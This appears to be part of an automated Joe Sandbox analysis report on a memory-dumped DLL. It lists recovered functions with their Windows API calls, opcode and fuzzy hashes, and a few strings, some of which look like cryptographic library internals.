API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 02b48737a808a4533b266ef3124cd83b5e6b2d658de385faad6d480724b8be5e
Instruction ID: 7bd58be3e8d8d08128ec7f1cb0d847d395a963a60c8f8e1c149e4f75e5b77748
Opcode Fuzzy Hash: 02b48737a808a4533b266ef3124cd83b5e6b2d658de385faad6d480724b8be5e
Instruction Fuzzy Hash: 5C311C70E006189FDB14DB6DCD84B9EB7BAAF85200F648ACAE419EB245C775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F890561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: a0e305946f10b0be55a7ebe168b1b195b1678a88a206ed5faadc4eb79d49f64d
Instruction ID: f63e1afa3422b5f3e5581504913a6741fbf8a8361011acf3fccf350c093cc05d
Opcode Fuzzy Hash: a0e305946f10b0be55a7ebe168b1b195b1678a88a206ed5faadc4eb79d49f64d
Instruction Fuzzy Hash: 07313E70E006189FCB14DB6DCD80B9DB7B9AF85300F208ACAE419EB252C775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8903DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 665344e3b9e88e0f6c1854a057b4f517cf28735bad83f69785d84239f090f2bb
Instruction ID: 4b324615cf89ea5ba410fa7c125becd78821519ab373b1ec18756d0636f6b8fa
Opcode Fuzzy Hash: 665344e3b9e88e0f6c1854a057b4f517cf28735bad83f69785d84239f090f2bb
Instruction Fuzzy Hash: 22311C70A006189FDB14CB6DCD80B9DB7B9AF85310F208ADAE419EB295CB75E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8902C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 47848e301ec9bdce66e15c8347b5ee57d24c5dd46576934027c187a11c531e8c
Instruction ID: aa4d4b84b9b7801e340f7f8600fc41d39529f821b6389d4a701a70b3abc195cf
Opcode Fuzzy Hash: 47848e301ec9bdce66e15c8347b5ee57d24c5dd46576934027c187a11c531e8c
Instruction Fuzzy Hash: 12312D70A006189FCB14CBADCD80B9DB7B9AF85310F608ADAE419EB256C775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8901BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 25d219dc5bd8881ecf51931291a5d29c31f63f1fc95b0bc467bf8a6813f77857
Instruction ID: 9976033714151cec37a1df7ff556764559dcfcdb8e9a9633635a4969a6731682
Opcode Fuzzy Hash: 25d219dc5bd8881ecf51931291a5d29c31f63f1fc95b0bc467bf8a6813f77857
Instruction Fuzzy Hash: 76310D70E006189FDB14DBADCD80B9DB7BAAF85300F2489DAE419EB256C775E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8900B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 318e69e3ab6b75a628bd8caee43d24ead35a4bc62c6bd15bcdb465fe3d157268
Instruction ID: f934573994907bcd0239ecce01503fce4d3ddb661e13a6984f08c52f32dca5c2
Opcode Fuzzy Hash: 318e69e3ab6b75a628bd8caee43d24ead35a4bc62c6bd15bcdb465fe3d157268
Instruction Fuzzy Hash: 78313C70E006189FCB14DB6DCC80B9DB7B9AF85300F208ACAE419EB252CB75E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F88FD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 02b48737a808a4533b266ef3124cd83b5e6b2d658de385faad6d480724b8be5e
Instruction ID: fe93b594f800db2742662488c114c8d9ced61f60ff66268a95b2393808429c4f
Opcode Fuzzy Hash: 02b48737a808a4533b266ef3124cd83b5e6b2d658de385faad6d480724b8be5e
Instruction Fuzzy Hash: 21312B70E006189FDB14CB6DCD80B9DB7B9AF85300F208ACAE419EB251C775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F899011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: a0e305946f10b0be55a7ebe168b1b195b1678a88a206ed5faadc4eb79d49f64d
Instruction ID: 3baab084eb1ba92f9d5f864648e884d7c4f3dee2aca5a8d2ac59c2e8b9b50922
Opcode Fuzzy Hash: a0e305946f10b0be55a7ebe168b1b195b1678a88a206ed5faadc4eb79d49f64d
Instruction Fuzzy Hash: 2F311A70E006189FCB14DB6DCD84B9EB7B9AF89200F248ACAE419EB245D775E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6F8E25B1,?,00000000,?), ref: 6F8E24E6
_malloc.LIBCMT ref: 6F8E251B
_memset.LIBCMT ref: 6F8E253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6F8E2550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F8E255E
__freea.LIBCMT ref: 6F8E2568

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: 8ee6e25b89693b8e4af4e76bf3d017171f4c97e9065452429015d3563d689740
Instruction ID: ba309b9a6991b029b78f0a4aec2522e7ce2cf4fc2c7016b825b57866036bd115
Opcode Fuzzy Hash: 8ee6e25b89693b8e4af4e76bf3d017171f4c97e9065452429015d3563d689740
Instruction Fuzzy Hash: 0A31647190020ABFEF01CF68DD90DAE7BA9EF49354F1108A6F915DA190D774ED64CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F898A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6F8969C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F896A08
Part of subcall function 6F8969C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F896A15
Part of subcall function 6F8969C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F896A41

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: cab3036414be44352aa0fe9a435a370fba06b86bba28139776d1fa4e81ca1740
Instruction ID: 3c2809012eccf335b546f0d13086b31bd2ee2e39ecb339e44fde0f8f55243e8f
Opcode Fuzzy Hash: cab3036414be44352aa0fe9a435a370fba06b86bba28139776d1fa4e81ca1740
Instruction Fuzzy Hash: FC310C71E006189FCB14DB6CCC80B9EB7BAAF85310F644ACAE419EB241C775E980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F88FF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6F8969C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F896A08
Part of subcall function 6F8969C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F896A15
Part of subcall function 6F8969C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F896A41

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: cab3036414be44352aa0fe9a435a370fba06b86bba28139776d1fa4e81ca1740
Instruction ID: ebe64544e01122a521354b3ef01120ebf47dd17d6fdd41a3cb2ede7d39b77f46
Opcode Fuzzy Hash: cab3036414be44352aa0fe9a435a370fba06b86bba28139776d1fa4e81ca1740
Instruction Fuzzy Hash: D8310C71E006189FDB14DB6DCD80B9DB7BAAF95310F204ACAE419EB251CB75E980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F88FD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6F8969C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F896A08
Part of subcall function 6F8969C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F896A15
Part of subcall function 6F8969C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F896A41

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 8961e016e32e494a91d9fbf84b8d69cd273f6b1c9740b0d6537d3fc6cdc92f37
Instruction ID: f05577c80a5a5652f38c9a9f782d80449292d14bea10bb233f310f0c4346e644
Opcode Fuzzy Hash: 8961e016e32e494a91d9fbf84b8d69cd273f6b1c9740b0d6537d3fc6cdc92f37
Instruction Fuzzy Hash: 77312B70E00618AFCB14DB6DCD80B9DB7BAAF95310F204ACAE519EB251DB75E9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D06A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 6F874760: __CxxThrowException@8.LIBCMT ref: 6F8747F9

_memmove.LIBCMT ref: 6F8D0907
_memmove.LIBCMT ref: 6F8D0936
_memmove.LIBCMT ref: 6F8D0959
__CxxThrowException@8.LIBCMT ref: 6F8D0A25

Strings

PSSR_MEM: message recovery disabled, xrefs: 6F8D09E3

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID: PSSR_MEM: message recovery disabled
API String ID: 2655171816-3051149714
Opcode ID: 8b527e1c9d7212606bb85ad9f2a05caa9f587bfd982ab433a487445124a0ed76
Instruction ID: 500157bf1132f61ceeb12244a627f2147988d741991e702fc03e11d39a4b993b
Opcode Fuzzy Hash: 8b527e1c9d7212606bb85ad9f2a05caa9f587bfd982ab433a487445124a0ed76
Instruction Fuzzy Hash: 83C149756083419FD718CF28C880B6AB7E5BFC9304F148A5DF5998B385DB30E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D7FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8D80EA

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

Min, xrefs: 6F8D83C5
Max, xrefs: 6F8D83E3
RandomNumberType, xrefs: 6F8D83A9
invalid bit length, xrefs: 6F8D8044

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: Max$Min$RandomNumberType$invalid bit length
API String ID: 3718517217-2498579642
